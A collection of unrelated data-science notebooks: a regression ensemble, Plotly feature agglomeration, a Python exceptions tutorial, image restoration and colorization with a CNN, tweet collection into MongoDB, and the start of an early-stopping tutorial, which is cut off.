Regresión Lineal Múltiple:
R^2 ajustada = 0.753 ECM = 3.158
LASSO:
R^2 ajustada = 0.768 ECM = 2.967
Ridge:
R^2 ajustada = 0.784 ECM = 5.496
###Markdown
Linear combination of the predictions
###Code
Y_pred_1 = (0.4*Y_pred_ridge) + (0.6*Y_pred_lasso) + (0*Y_pred_lin)
# Valores estimados vs valores reales
eje_X = range(1,len(Y_test)+1)
plt.plot(eje_X, sorted(Y_test), color = 'black') #Recta de valores reales
plt.plot(eje_X, sorted(Y_pred_1), color = 'red') #Recta de valores estimados
plt.title('Valores estimados vs valores reales')
plt.xlabel('Índices')
plt.ylabel('Calificación')
plt.show()
#Nota: Tanto los valores reales como los estimados se ordenaron de menor a mayor.
## 7) EVALUACIÓN DEL MODELO
#Calculamos el error cuadrático medio: $\dfrac{\displaystyle \sum_{i = 1}^{n} (real_{i} − estimado_{i})^{2}}{n}$
ECM_1 = round(mean_squared_error(Y_test, Y_pred_1),3)
print(ECM_1)
Y_pred_2 = (0*Y_pred_ridge) + (0.4*Y_pred_lasso) + (0.6*Y_pred_lin)
# Valores estimados vs valores reales
eje_X = range(1,len(Y_test)+1)
plt.plot(eje_X, sorted(Y_test), color = 'black') #Recta de valores reales
plt.plot(eje_X, sorted(Y_pred_2), color = 'red') #Recta de valores estimados
plt.title('Valores estimados vs valores reales')
plt.xlabel('Índices')
plt.ylabel('Calificación')
plt.show()
#Nota: Tanto los valores reales como los estimados se ordenaron de menor a mayor.
## 7) EVALUACIÓN DEL MODELO
#Calculamos el error cuadrático medio: $\dfrac{\displaystyle \sum_{i = 1}^{n} (real_{i} − estimado_{i})^{2}}{n}$
ECM_2 = round(mean_squared_error(Y_test, Y_pred_2),3)
print(ECM_2)
Y_pred_3 = (0.5*Y_pred_ridge) + (0.4*Y_pred_lasso) + (0.1*Y_pred_lin)
## 7) EVALUACIÓN DEL MODELO
#Calculamos el error cuadrático medio: $\dfrac{\displaystyle \sum_{i = 1}^{n} (real_{i} − estimado_{i})^{2}}{n}$
ECM_3 = round(mean_squared_error(Y_test, Y_pred_3),3)
print(ECM_3)
###Output
16.004
###Markdown
Let's find the optimal weights by minimizing the mean squared error
###Code
#Se define una función que calcula los pesos para la combinación lineal de los modelos
def objective(weights,train_predictions,y_train):
y_ens = np.average(train_predictions, axis=1, weights=weights)
return mean_squared_error(y_train, y_ens)
#Se define una matriz con los valores de las predicciones de los modelos
train_predictions = np.concatenate([Y_pred_ridge[:, None],
Y_pred_lasso[:, None],
Y_pred_lin[:,None]], axis=1)
#Define the initial weights
w0 = [0.2,0.5,0.3]
#Define the bounds for the weights (they must lie between 0 and 1)
bounds = [(0,1)] * train_predictions.shape[1]
#Define the constraints: the weights must sum to 1
cons = [{'type': 'eq','fun': lambda w: w.sum() - 1}]
#Use the "minimize" function to minimize the objective (the mean squared error)
#The "SLSQP" method supports constraints
res = minimize(objective,
w0,
args = (train_predictions,Y_test),
method='SLSQP',
bounds=bounds,
options={'disp':True, 'maxiter':10000},
constraints=cons)
pesos_opt = res.x
print('\nPesos Óptimos:')
print('Ridge: {:.4f}'.format(pesos_opt[0]))
print('LASSO: {:.4f}'.format(pesos_opt[1]))
print('Regresión Lineal: {:.4f}'.format(pesos_opt[2]))
Y_pred_4 = (pesos_opt[0]*Y_pred_ridge) + (pesos_opt[1]*Y_pred_lasso) + (pesos_opt[2]*Y_pred_lin)
## 7) EVALUACIÓN DEL MODELO
#Calculamos el error cuadrático medio: $\dfrac{\displaystyle \sum_{i = 1}^{n} (real_{i} − estimado_{i})^{2}}{n}$
ECM_4 = round(mean_squared_error(Y_test, Y_pred_4),3)
print(ECM_4)
###Output
5.496
###Markdown
Conclusions
###Code
print("Regresión Lineal Múltiple:")
print("R^2 ajustada = ",round(r_cuad_aj_lin,3)," ECM = ",round(ECM_lin,3))
print("\nLASSO:")
print("R^2 ajustada = ",round(r_cuad_aj_lasso,3)," ECM = ",round(ECM_lasso,3))
print("\nRidge:")
print("R^2 ajustada = ",round(r_cuad_aj_ridge,3)," ECM = ",round(ECM_ridge,3))
print("\nCombinación lineal 1:")
print("ECM = ",round(ECM_1,3))
print("\nCombinación lineal 2:")
print("ECM = ",round(ECM_2,3))
print("\nCombinación lineal 3:")
print("ECM = ",round(ECM_3,3))
print("\nCombinación lineal óptima:")
print("ECM = ",round(ECM_4,3))
###Output
Regresión Lineal Múltiple:
R^2 ajustada = 0.753 ECM = 3.158
LASSO:
R^2 ajustada = 0.768 ECM = 2.967
Ridge:
R^2 ajustada = 0.784 ECM = 5.496
Combinación lineal 1:
ECM = 20.0
Combinación lineal 2:
ECM = 43.63
Combinación lineal 3:
ECM = 16.004
Combinación lineal óptima:
ECM = 5.496
|
_posts/scikit/feature-agglomeration/Feature agglomeration.ipynb | ###Markdown
New to Plotly?Plotly's Python library is free and open source! [Get started](https://plot.ly/python/getting-started/) by downloading the client and [reading the primer](https://plot.ly/python/getting-started/).You can set up Plotly to work in [online](https://plot.ly/python/getting-started/initialization-for-online-plotting) or [offline](https://plot.ly/python/getting-started/initialization-for-offline-plotting) mode, or in [jupyter notebooks](https://plot.ly/python/getting-started/start-plotting-online).We also have a quick-reference [cheatsheet](https://images.plot.ly/plotly-documentation/images/python_cheat_sheet.pdf) (new!) to help you get started! Version
###Code
import sklearn
sklearn.__version__
###Output
_____no_output_____
###Markdown
Imports
###Code
print(__doc__)
import plotly.plotly as py
import plotly.graph_objs as go
from plotly import tools
import numpy as np
import matplotlib.pyplot as plt
from sklearn import datasets, cluster
from sklearn.feature_extraction.image import grid_to_graph
###Output
Automatically created module for IPython interactive environment
###Markdown
Calculations
###Code
digits = datasets.load_digits()
images = digits.images
X = np.reshape(images, (len(images), -1))
connectivity = grid_to_graph(*images[0].shape)
agglo = cluster.FeatureAgglomeration(connectivity=connectivity,
n_clusters=32)
agglo.fit(X)
X_reduced = agglo.transform(X)
X_restored = agglo.inverse_transform(X_reduced)
images_restored = np.reshape(X_restored, images.shape)
###Output
_____no_output_____
###Markdown
Plot Result
###Code
fig = tools.make_subplots(rows=3, cols=4,
print_grid=False,
subplot_titles = ('','Original Data','','',
'','Agglomerated Data','','',
'Labels'),
specs=[[{}, {}, {}, {}],
[{}, {}, {}, {}],
[None, {}, None, None]
])
def matplotlib_to_plotly(cmap, pl_entries):
h = 1.0/(pl_entries-1)
pl_colorscale = []
for k in range(pl_entries):
        C = list(map(np.uint8, np.array(cmap(k*h)[:3])*255))  # wrap in list() so indexing also works on Python 3
        pl_colorscale.append([k*h, 'rgb'+str((C[0], C[1], C[2]))])
return pl_colorscale
for i in range(4):
original = go.Heatmap(z=images[i], showscale=False,
colorscale=matplotlib_to_plotly(plt.cm.gray,
len(images[i])))
fig.append_trace(original, 1, i+1)
agglomerated = go.Heatmap(z=images_restored[i],
showscale=False,
colorscale=matplotlib_to_plotly(plt.cm.gray,
len(images_restored[i])))
fig.append_trace(agglomerated , 2, i+1)
labels = go.Heatmap(z=np.reshape(agglo.labels_, images[0].shape),
showscale=False,
colorscale=matplotlib_to_plotly(plt.cm.spectral,
len(np.reshape(agglo.labels_, images[0].shape))))
fig.append_trace(labels , 3, 2)
fig['layout'].update(height=900)
for i in map(str,range(1,10)):
y = 'yaxis'+i
x = 'xaxis'+i
fig['layout'][y].update(autorange='reversed',
showticklabels=False, ticks='')
fig['layout'][x].update(showticklabels=False, ticks='')
py.iplot(fig)
###Output
_____no_output_____
###Markdown
License Code source: Gaël Varoquaux Modified for documentation by Jaques GroblerLicense: BSD 3 clause
###Code
from IPython.display import display, HTML
display(HTML('<link href="//fonts.googleapis.com/css?family=Open+Sans:600,400,300,200|Inconsolata|Ubuntu+Mono:400,700" rel="stylesheet" type="text/css" />'))
display(HTML('<link rel="stylesheet" type="text/css" href="http://help.plot.ly/documentation/all_static/css/ipython-notebook-custom.css">'))
! pip install git+https://github.com/plotly/publisher.git --upgrade
import publisher
publisher.publish(
'Feature agglomeration.ipynb', 'scikit-learn/plot_digits_agglomeration/', 'Feature Agglomeration | plotly',
' ',
title = 'Feature Agglomeration | plotly',
name = 'Feature Agglomeration',
has_thumbnail='true', thumbnail='thumbnail/feature-agglomeration.jpg',
language='scikit-learn', page_type='example_index',
display_as='clustering', order=2,
ipynb= '~Diksha_Gabha/2749')
###Output
_____no_output_____ |
notebooks/12_exception_handling.ipynb | ###Markdown
ErrorsErrors are messages being raised when python finds itself in a situation it isn't supposed to be in.For example, when we forget to close a bracket or make any mistake concerning the language's syntax, we will raise a *SyntaxError*.
###Code
if True print('something') # we get a SyntaxError
###Output
_____no_output_____
###Markdown
When trying to use a variable we haven't assigned, we raise a *NameError*.
###Code
print(a) # we get a NameError
###Output
_____no_output_____
###Markdown
When trying to perform an operation that is not supported for the objects we are trying to use it on, we raise a *TypeError*.
###Code
'a' + 3 # we get a TypeError
###Output
_____no_output_____
###Markdown
When passing an index to a list that is out of its range, we raise an *IndexError*.
###Code
l = [0, 1, 2]
l[3]
###Output
_____no_output_____
###Markdown
When referencing a dictionary key that does not exist, we raise a *KeyError*.
###Code
d = {'a': 1, 'b': 2}
d['c']
###Output
_____no_output_____
###Markdown
When attempting to divide by zero (in regular python), we will raise a *ZeroDivisionError*.
###Code
1/0 # we get a ZeroDivisionError
###Output
_____no_output_____
###Markdown
and so on...These different types of errors exist to inform us on what **kind** of mistake we made. It is important to differentiate between two types of errors:- **SyntaxErrors** are errors the interpreter finds when it is trying to parse the commands given to him. These errors are fatal for the execution of the script. These errors need to be corrected!- Errors that occur **during execution** are known as **exceptions** and can be **handled**!Handling of exceptions is done with the `try...except` block. This block consists of two parts: The `try` block contains all the commands we want python to **try** to execute. **If** an error occurs, the rest of the commands in the `try` block are skipped and python starts executing the commands in the `except` block. If no error is found, python performs all commands in the `try` block but **ignores** the `except` block.Syntax is:```pythontry: Operations we want python to try to execute. If an 'ErrorName' type error is encountered, python skips the rest of the commands in the try blockexcept ErrorName: Operations we want executed IF python encounters an error of the 'ErrorName' type.``` Example 1We want the user to enter a number from the keyboard:
###Code
while True:
try:
# under this line we put the commands we want python to try to perform
x = int(input('Please enter a number: '))
# here we want the user to enter something from the keyboard and then we try to convert this to an integer
# if it is not a number the casting cannot be performed and we will have raised a ValueError
break
# if we didn't raise an error the next command will be performed (which exits the while loop)
except ValueError:
# This command is how we 'catch' errors. This means that if we raised a ValueError, python skips the rest
# of the try block and performs the commands of the except block!
print('Not a valid number, try again!')
# if we want to just ignore the error (and not print anything like here) we can just use pass
###Output
Please enter a number: a
Not a valid number, try again!
Please enter a number: '5'
Not a valid number, try again!
Please enter a number: 5
###Markdown
There are many ways of handling exceptions in python, using the `try...except` block.- Multiple exceptions:```pythontry: ...except(RuntimeError, TypeError, NameError): ...```- Refering to exceptions in a different way (and handling them): - In python 3:```pythontry: ...except ValueError as ve: refers to the instance of the ValueError exception we caught as 've' print(type(ve)) print(ve.args) prints the arguments of the error print(ve) prints the __str__() method of the ValueError class ...``` - In python 2:```pythontry: ...except ValueError, ve: same exact thing as above ...``` - Ingnore all exceptions:```pythontry: ...except: catches all exceptions pass ignores them```**Broad except clauses like the above are not recommended**. Raising exceptions.The `raise` statement allows the programmer to force a specified exception to occur.Syntax is:```pythonraise ErrorName(arguments)```
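For instance, a small self-contained example (the `parse_ratio` function below is hypothetical, written just for illustration) combining both patterns:
```python
# Catch several exception types in one clause and bind the caught exception to a name
def parse_ratio(a, b):
    try:
        return int(a) / int(b)
    except (ValueError, TypeError) as exc:   # several exception types handled together
        print('Bad input:', type(exc).__name__, exc.args)
    except ZeroDivisionError as exc:         # a separate clause for a different error
        print('Cannot divide by zero:', exc)

parse_ratio('10', '2')   # returns 5.0
parse_ratio('10', 'x')   # prints: Bad input: ValueError ...
parse_ratio('10', '0')   # prints: Cannot divide by zero ...
```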
###Code
raise NameError('my error')
###Output
_____no_output_____
###Markdown
The argument in raise indicates the exception to be raised. This **must** be either an **exception instance** or an **exception class** (a class that derives from Exception). Defining ExceptionsSometimes it is useful to define our own `type` of error. This can be done by creating a class that **derives from python's Exception class** either directly, or indirectly.```pythonclass CustomError(Exception): ...```
###Code
class MyError(Exception):
# A user-defined exception must be derived directly or indirectly from the Exception class.
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
raise MyError('muahaha!')
###Output
_____no_output_____
###Markdown
AssertionsThe `assert` statement helps the programmer find bugs and ensure his program is used the way he meant it to be used. The assert statements tests a condition, if it is `True` it continues; if it is `False`, it raises an **AssertionError**.```pythonassert condition, arguments```The arguments are optional and are passed as arguments to the `AssertionError()` exception.Assert is roughly equivalent to:```pythonif not condition: raise AssertionError(arguments)```
###Code
cnd1 = (5 == 5) # True
cnd2 = (5 == '5') # False
assert cnd1, 'Failed condition 1!' # does nothing
assert cnd2, 'Failed condition 2!' # raises an AssertionError
###Output
_____no_output_____
###Markdown
For nother example of an assertion, we will check if a user-defined exception class (that we call `err`), is a valid python `Exception`:
###Code
err = MyError
assert issubclass(err, Exception), '{} is not a suitable class for an exception, ' \
'because {} is not derived from class Exception'.format(err.__name__, err.__name__)
###Output
_____no_output_____ |
Final .ipynb | ###Markdown
Load all required libraries Summary - - Numpy for stacking images in an array- OpenCV for image restoration- Matplotlib for general plotting tasks- Skimage for image restoration- Pandas for general python data manipulations- Random for selecting random images from dataset for testing colorization feature- PIL for Image manipulation- OS for file manipulation, etc.- TensorFlow for foundational support with creation of deep learning model- Keras for high-level experimentation with deep learning model
###Code
#import libraries
import numpy as np
import cv2 as cv
from matplotlib import pyplot as plt
import skimage
from skimage import io
import pandas as pd
import random
from PIL import Image
import skimage
from skimage.transform import resize
from skimage.color import rgb2lab
import os
import tensorflow as tf
from tensorflow.keras.applications import MobileNetV2
from tensorflow.keras.models import Model, Sequential, load_model
from tensorflow.keras.layers import Conv2D, Conv2DTranspose, Reshape, Dropout, LeakyReLU, BatchNormalization, Input, Concatenate, Activation, concatenate
from tensorflow.keras.initializers import RandomNormal
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.utils import plot_model
###Output
_____no_output_____
###Markdown
Define structure for a convolutional encoder-decoder deep learning model that colorizes grayscale imagesThe main inspiration for this approach was this paper published in 2017 - https://arxiv.org/abs/1712.03400 The code block below performs the following actions: - Randomly initialize the weights for our neural network (to satisfy the expectation of SGD i.e. Stochastic Gradient Descent)- Initialize an input layer that takes in images of size 224 by 224 pixels- Use the pretrained (imagenet data) neural network MobileNetV2 for high-level feature extraction- Dropouts are implemented to prevent overfitting (this is done by dropping neurons at certain stages to train different neural networks each time)- The output layer is configured for A and B channels (intended to be merged with the L channel) of our input images
###Code
# build a network for training on our dataset, use the pretrained MobileNet for deep layers
# prepare the kernel initializer values
weight_init = RandomNormal(stddev=0.02)
# prepare the Input layer
net_input = Input((224,224,3))
# download mobile net, and use it as the base.
mobile_net_base = MobileNetV2(include_top=False, input_shape=(224,224,3), weights='imagenet')
mobilenet = mobile_net_base(net_input)
# encoder block #
# 224x224
conv1 = Conv2D(64, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(net_input)
conv1 = LeakyReLU(alpha=0.2)(conv1)
# 112x112
conv2 = Conv2D(128, (3, 3), strides=(1, 1), padding='same', kernel_initializer=weight_init)(conv1)
conv2 = LeakyReLU(alpha=0.2)(conv2)
# 112x112
conv3 = Conv2D(128, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(conv2)
conv3 = Activation('relu')(conv3)
# 56x56
conv4 = Conv2D(256, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(conv3)
conv4 = Activation('relu')(conv4)
# 28x28
conv4_ = Conv2D(256, (3, 3), strides=(1, 1), padding='same', kernel_initializer=weight_init)(conv4)
conv4_ = Activation('relu')(conv4_)
# 28x28
conv5 = Conv2D(512, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(conv4_)
conv5 = Activation('relu')(conv5)
# 14x14
conv5_ = Conv2D(256, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(conv5)
conv5_ = Activation('relu')(conv5_)
#7x7
# fusion layer - connect MobileNet with our encoder
conc = concatenate([mobilenet, conv5_])
fusion = Conv2D(512, (1, 1), padding='same', kernel_initializer=weight_init)(conc)
fusion = Activation('relu')(fusion)
# skip fusion layer
skip_fusion = concatenate([fusion, conv5_])
# decoder block #
# 7x7
decoder = Conv2DTranspose(512, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(skip_fusion)
decoder = Activation('relu')(decoder)
decoder = Dropout(0.25)(decoder)
# skip layer from conv5 (with added dropout)
skip_4_drop = Dropout(0.25)(conv5)
skip_4 = concatenate([decoder, skip_4_drop])
# 14x14
decoder = Conv2DTranspose(256, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(skip_4)
decoder = Activation('relu')(decoder)
decoder = Dropout(0.25)(decoder)
# skip layer from conv4_ (with added dropout)
skip_3_drop = Dropout(0.25)(conv4_)
skip_3 = concatenate([decoder, skip_3_drop])
# 28x28
decoder = Conv2DTranspose(128, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(skip_3)
decoder = Activation('relu')(decoder)
decoder = Dropout(0.25)(decoder)
# 56x56
decoder = Conv2DTranspose(64, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(decoder)
decoder = Activation('relu')(decoder)
decoder = Dropout(0.25)(decoder)
# 112x112
decoder = Conv2DTranspose(64, (3, 3), strides=(1, 1), padding='same', kernel_initializer=weight_init)(decoder)
decoder = Activation('relu')(decoder)
# 112x112
decoder = Conv2DTranspose(32, (3, 3), strides=(2, 2), padding='same', kernel_initializer=weight_init)(decoder)
decoder = Activation('relu')(decoder)
# 224x224
# output layer, with 2 channels (a and b)
output_layer = Conv2D(2, (1, 1), activation='tanh')(decoder)
###Output
_____no_output_____
###Markdown
Configure model to be optimized using Adam optimizer, specified learning rate and mean-squared error loss- This step loads the weights derived upon training our deep learning model for 100 epochs on the entire MIRFLICKR25k dataset (in batches of 3000 each)
###Code
# configure model
model = Model(net_input, output_layer)
model.compile(Adam(lr=0.0002), loss='mse', metrics=['accuracy'])
# load weights
model.load_weights('trained_on_all_is_for_100_es.h5')
###Output
_____no_output_____
###Markdown
Define all functions for getting predictions and constructing complete colorized RGB image based on LAB inputs
###Code
def get_pred(model, image_l):
"""
Summary -
This function generates the predicted A and B channels of the colorized image
:param model: Trained model
:type model: tensorflow.python.keras.engine.training.Model
:param image_l: The L channel of the input grayscale image
:type image_l: numpy.ndarray
:return: Predicted A and B channels of the input grayscale image
:rtype: numpy.ndarray
"""
# repeat the L value to match input shape
image_l_R = np.repeat(image_l[..., np.newaxis], 3, -1)
image_l_R = image_l_R.reshape((1, 224, 224, 3))
# normalize the input
image_l_R = (image_l_R.astype('float32') - 127.5) / 127.5
# make prediction
prediction = model.predict(image_l_R)
# normalize the output
pred = (prediction[0].astype('float32') * 127.5) + 127.5
return pred
def get_LAB(image_l, image_ab):
"""
Summary -
This function generates the compiled RGB equivalent of the inputted L plus the predicted A and B channels
:param image_l: Grayscale image (1 layer, L)
:type image_l: numpy.ndarray
:param image_ab: Predicted image (2 layers, A and B)
:type image_ab: numpy.ndarray
:return: Compiled image (3 layers, RGB)
:rtype: numpy.ndarray
"""
image_l = image_l.reshape((224, 224, 1))
image_lab = np.concatenate((image_l, image_ab), axis=2)
image_lab = image_lab.astype("uint8")
image_rgb = cv.cvtColor(image_lab, cv.COLOR_LAB2RGB)
image_rgb = Image.fromarray(image_rgb)
return image_rgb
def create_sample(model, image_gray):
"""
Summary -
This function creates the output we need from colorization
:param model: Trained model
:type model: tensorflow.python.keras.engine.training.Model
:param image_gray: Grayscale image (1 layer, L)
:type image_gray: numpy.ndarray
:return: Result image
:rtype: numpy.ndarray
"""
# get the model's prediction
pred = get_pred(model, image_gray)
# combine input and output to LAB image
image = get_LAB(image_gray, pred)
# create new combined image, save it
new_image = Image.new('RGB', (224, 224))
new_image.paste(image, (0, 0))
return new_image
# Define function for
def show_image(Selection,l,i):
"""
Summary -
Selects the image based on user choice and sends it to the deep learning model for processing
:param Selection: Image label chosen by user
:type model: String
:param l: list of labels
:type l: list
:param i: list of processed images
:type i: list
"""
index = l.index(Selection)
img = i[index]
mod_img = resize(rgb2lab(img.copy())[:,:,0], (224,224), anti_aliasing=True)
sample = create_sample(model, mod_img)
sample.save('output/output.jpg')
fig, axes = plt.subplots(ncols = 2, figsize = (15,5))
axes[0].imshow(img)
axes[0].axis('off')
axes[0].set_title(Selection)
axes[1].imshow(sample)
axes[1].axis('off')
axes[1].set_title('Auto-Colored')
def img_restoration(img):
"""
Summary -
This function is created to carry out image restoration process in steps
:param img: Image that needs to be restored
:type img: Imageio class array
:return: list of images and labels
:rtype: String and imageio array list
"""
#perform denoising of the image
denoised = cv.fastNlMeansDenoisingColored(img,None,7,10,6,21)
#canny edge detection
edges = cv.Canny(denoised,200,250)
#filter for image processing
kernel = np.ones((5,5),np.uint8)
#image dilation
dilation = cv.morphologyEx(edges, cv.MORPH_DILATE, kernel)
closing = cv.morphologyEx(dilation, cv.MORPH_CLOSE, kernel)
erode = cv.morphologyEx(closing,cv.MORPH_ERODE, kernel)
#fill in missing gaps
inpainted = cv.inpaint(denoised,erode,5,cv.INPAINT_TELEA)
#overlay denoised image over smoothed out image
alpha = 0.5
overlaid = inpainted.copy()
cv.addWeighted(denoised, alpha, overlaid, 1 - alpha,0, overlaid)
#convert image to gray
img2gray = cv.cvtColor(denoised,cv.COLOR_BGR2GRAY)
#create mask and inverse mask based on threshold
ret, mask = cv.threshold(img2gray, 100, 255, cv.THRESH_BINARY_INV)
#combine via bit addition denoised image human and smoothed out background of inpainted image
bg1 = cv.bitwise_and(denoised,denoised,mask = mask)
mask_inv = cv.bitwise_not(mask)
bg2 = cv.bitwise_and(overlaid,overlaid,mask = mask_inv)
combined = cv.add(bg1,bg2)
#store the various processed images
images = [img,denoised,inpainted,overlaid,combined]
labels = ['Original','Choice 1','Choice 2', 'Choice 3', 'Choice 4']
return images, labels
def display_images(images,labels):
"""
Summary -
This function displays the various processed images and labels associated with them
:param images: list of processed images
:type images: list
:param labels: list of labels
:type labels: list
"""
fig, axes = plt.subplots(ncols = 5, figsize = (15,5))
axes[0].imshow(images[0])
axes[0].axis('off')
axes[0].set_title(labels[0])
axes[1].imshow(images[1])
axes[1].axis('off')
axes[1].set_title(labels[1])
axes[2].imshow(images[2])
axes[2].axis('off')
axes[2].set_title(labels[2])
axes[3].imshow(images[3])
axes[3].axis('off')
axes[3].set_title(labels[3])
axes[4].imshow(images[4])
axes[4].axis('off')
axes[4].set_title(labels[4])
!jupyter nbextension enable --py widgetsnbextension
import ipywidgets as widgets
from IPython.display import display, clear_output
from ipywidgets import interact, interact_manual, fixed, Output
#create button for widget
button = widgets.Button(description="Begin Restoration")
save = widgets.Button(description="Save Result")
#create text box for widget
filename = widgets.Text(value='<filename>.jpg',placeholder='Type something',disabled=False)
#create output area for widget
output = widgets.Output()
#layout setting piece for code
vertical = widgets.VBox([widgets.Label(value="Enter the name of the picture you want to restore:"),widgets.HBox([filename, button])])
display(vertical)
display(output)
def on_button_clicked(b):
"""
Summary -
This function handles the button clicked event
:param b: passes a reference to the button itself
:type b: Widgets Button
"""
with output:
clear_output()
#read the image
img = io.imread("images/"+filename.value)
#gets 4 different kinds of processed images
images, labels = img_restoration(img)
#displays the various options
display_images(images,labels)
display(widgets.Label(value="Select the picture you want to color:"))
#code that calls the model based on user selected image
interact(show_image, Selection = labels, l=fixed(labels), i=fixed(images), description = 'Choose image to color')
display(widgets.Label(value="Output saved to the output folder"))
button.on_click(on_button_clicked)
###Output
_____no_output_____
###Markdown
Collect Tweets into MongoDB Install Python libraries. You may need to restart your Jupyter Notebook instance after installing those libraries.
###Code
!pip install pymongo
!pip install pymongo[srv]
!pip install dnspython
!pip install tweepy
!pip install twitter
###Output
Requirement already satisfied: twitter in /home/ec2-user/anaconda3/envs/python3/lib/python3.6/site-packages (1.18.0)
[33mWARNING: You are using pip version 20.0.2; however, version 20.3.1 is available.
You should consider upgrading via the '/home/ec2-user/anaconda3/envs/python3/bin/python -m pip install --upgrade pip' command.[0m
###Markdown
Import Python libraries
###Code
import pymongo
from pymongo import MongoClient
import json
import tweepy
import twitter
from pprint import pprint
import configparser
import pandas as pd
###Output
_____no_output_____
###Markdown
Load the Authorization Info Save database connection info and API Keys in a config.ini file and use the configparser module to load the authorization info.
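As a reference, a minimal sketch of how such a config.ini could be created with configparser; the section and key names match the ones read in the next cell, while all values shown here are placeholders to be replaced with your own credentials.
```python
import configparser

config = configparser.ConfigParser()
config['mytwitter'] = {
    'api_key': '<YOUR_CONSUMER_KEY>',
    'api_secrete': '<YOUR_CONSUMER_SECRET>',
    'access_token': '<YOUR_ACCESS_TOKEN>',
    'access_secrete': '<YOUR_ACCESS_TOKEN_SECRET>',
}
config['mymongo'] = {
    'connection': 'mongodb+srv://<user>:<password>@<cluster>/<database>'
}
# Write the file next to the notebook so the cell below can read it
with open('config.ini', 'w') as f:
    config.write(f)
```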
###Code
config = configparser.ConfigParser()
config.read('config.ini')
CONSUMER_KEY = config['mytwitter']['api_key']
CONSUMER_SECRET = config['mytwitter']['api_secrete']
OAUTH_TOKEN = config['mytwitter']['access_token']
OATH_TOKEN_SECRET = config['mytwitter']['access_secrete']
mongod_connect = config['mymongo']['connection']
###Output
_____no_output_____
###Markdown
Connect to the MongoDB Cluster
###Code
client = MongoClient(mongod_connect)
db = client.gp31 # use or create a database named gp31
final_project = db.final_project #use or create a collection named final_project
final_project.create_index([("id", pymongo.ASCENDING)],unique = True) # make sure the collected tweets are unique
###Output
_____no_output_____
###Markdown
Use the REST API to Collect Tweets Authorize the REST API
###Code
rest_auth = twitter.oauth.OAuth(OAUTH_TOKEN,OATH_TOKEN_SECRET,CONSUMER_KEY,CONSUMER_SECRET)
rest_api = twitter.Twitter(auth=rest_auth)
###Output
_____no_output_____
###Markdown
Define the query for the REST API
###Code
count = 100
geocode = "47.650589,-100.437012,150mi"
q = "COVID19"
###Output
_____no_output_____
###Markdown
The collected tweets will contain 'COVID19' AND are located within a 150-mile radius of the coordinates specified above
###Code
search_results = rest_api.search.tweets(count=count, q=q, geocode=geocode) #you can use both q and geocode
statuses = search_results["statuses"]
since_id_new = statuses[-1]['id']
for statuse in statuses:
try:
final_project.insert_one(statuse)
pprint(statuse['created_at'])
except:
pass
###Output
'Thu Dec 10 20:22:05 +0000 2020'
'Thu Dec 10 20:20:18 +0000 2020'
'Thu Dec 10 20:19:01 +0000 2020'
'Thu Dec 10 20:16:21 +0000 2020'
'Thu Dec 10 20:16:03 +0000 2020'
'Thu Dec 10 20:11:54 +0000 2020'
'Thu Dec 10 20:06:40 +0000 2020'
'Thu Dec 10 20:01:18 +0000 2020'
'Thu Dec 10 19:57:30 +0000 2020'
'Thu Dec 10 19:56:43 +0000 2020'
'Thu Dec 10 19:56:40 +0000 2020'
'Thu Dec 10 19:56:34 +0000 2020'
'Thu Dec 10 19:52:35 +0000 2020'
'Thu Dec 10 19:51:33 +0000 2020'
'Thu Dec 10 19:48:55 +0000 2020'
'Thu Dec 10 19:46:54 +0000 2020'
###Markdown
Continue fetching early tweets with the same query. YOU WILL REACH YOUR RATE LIMIT VERY FAST
###Code
since_id_old = 0
while(since_id_new != since_id_old):
since_id_old = since_id_new
search_results = rest_api.search.tweets( count=count,q=q,
geocode=geocode, max_id= since_id_new)
statuses = search_results["statuses"]
since_id_new = statuses[-1]['id']
for statuse in statuses:
try:
final_project.insert_one(statuse)
pprint(statuse['created_at']) # print the date of the collected tweets
except:
pass
###Output
_____no_output_____
###Markdown
View the Collected Tweets Print the number of tweets and unique twitter users
###Code
print(final_project.estimated_document_count())# number of tweets collected
user_cursor = final_project.distinct("user.id")
print (len(user_cursor)) # number of unique Twitter users
###Output
2812
1771
###Markdown
Create a text index and print the Tweets containing specific keywords.
###Code
final_project.create_index([("text", pymongo.TEXT)], name='text_index', default_language='english') # create a text index
###Output
_____no_output_____
###Markdown
Create a cursor to query tweets with the created index
###Code
tweet_cursor = final_project.find({"$text": {"$search": "vote"}}) # return tweets that contain "vote"
###Output
_____no_output_____
###Markdown
Use pprint to display tweets
###Code
for document in tweet_cursor[0:10]: # display the first 10 tweets from the query
try:
print ('----')
# pprint (document) # use pprint to print the entire tweet document
print ('name:', document["user"]["name"]) # user name
print ('text:', document["text"]) # tweets
except:
print ("***error in encoding")
pass
tweet_cursor = final_project.find({"$text": {"$search": "vote"}}) # return tweets contain vote
###Output
_____no_output_____
###Markdown
Use pandas to display tweets
###Code
tweet_df = pd.DataFrame(list(tweet_cursor ))
tweet_df[:10] #display the first 10 tweets
tweet_df["favorite_count"].hist() # create a histogram show the favorite count
###Output
_____no_output_____ |
04-early-stopping.ipynb | ###Markdown
Automatic training stop (Early Stopping)The _Early Stopping_ technique is extremely important when training neural networks. It consists of monitoring a metric or value that the model is being evaluated on, so that when this value stops improving, training is halted automatically.It is a key technique for avoiding overfitting in neural networks, and it also builds an understanding of what is happening during training.In this document we will look at an example applied to a CNN that classifies the CIFAR-10 dataset, using techniques such as _Batch Normalization_ and _Early Stopping_ to observe their effect.
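Before the Keras example, here is a minimal, framework-free sketch of the early-stopping logic itself; `train_one_epoch` and `evaluate` are hypothetical placeholders, and `patience` plays the same role as in the Keras callback used later:
###Code
# Minimal early-stopping loop (sketch, not the Keras implementation)
def fit_with_early_stopping(train_one_epoch, evaluate, max_epochs=100, patience=5):
    best_loss = float("inf")
    epochs_without_improvement = 0
    for epoch in range(max_epochs):
        train_one_epoch()
        val_loss = evaluate()
        if val_loss < best_loss:
            best_loss = val_loss
            epochs_without_improvement = 0  # reset the counter on improvement
        else:
            epochs_without_improvement += 1
            if epochs_without_improvement >= patience:
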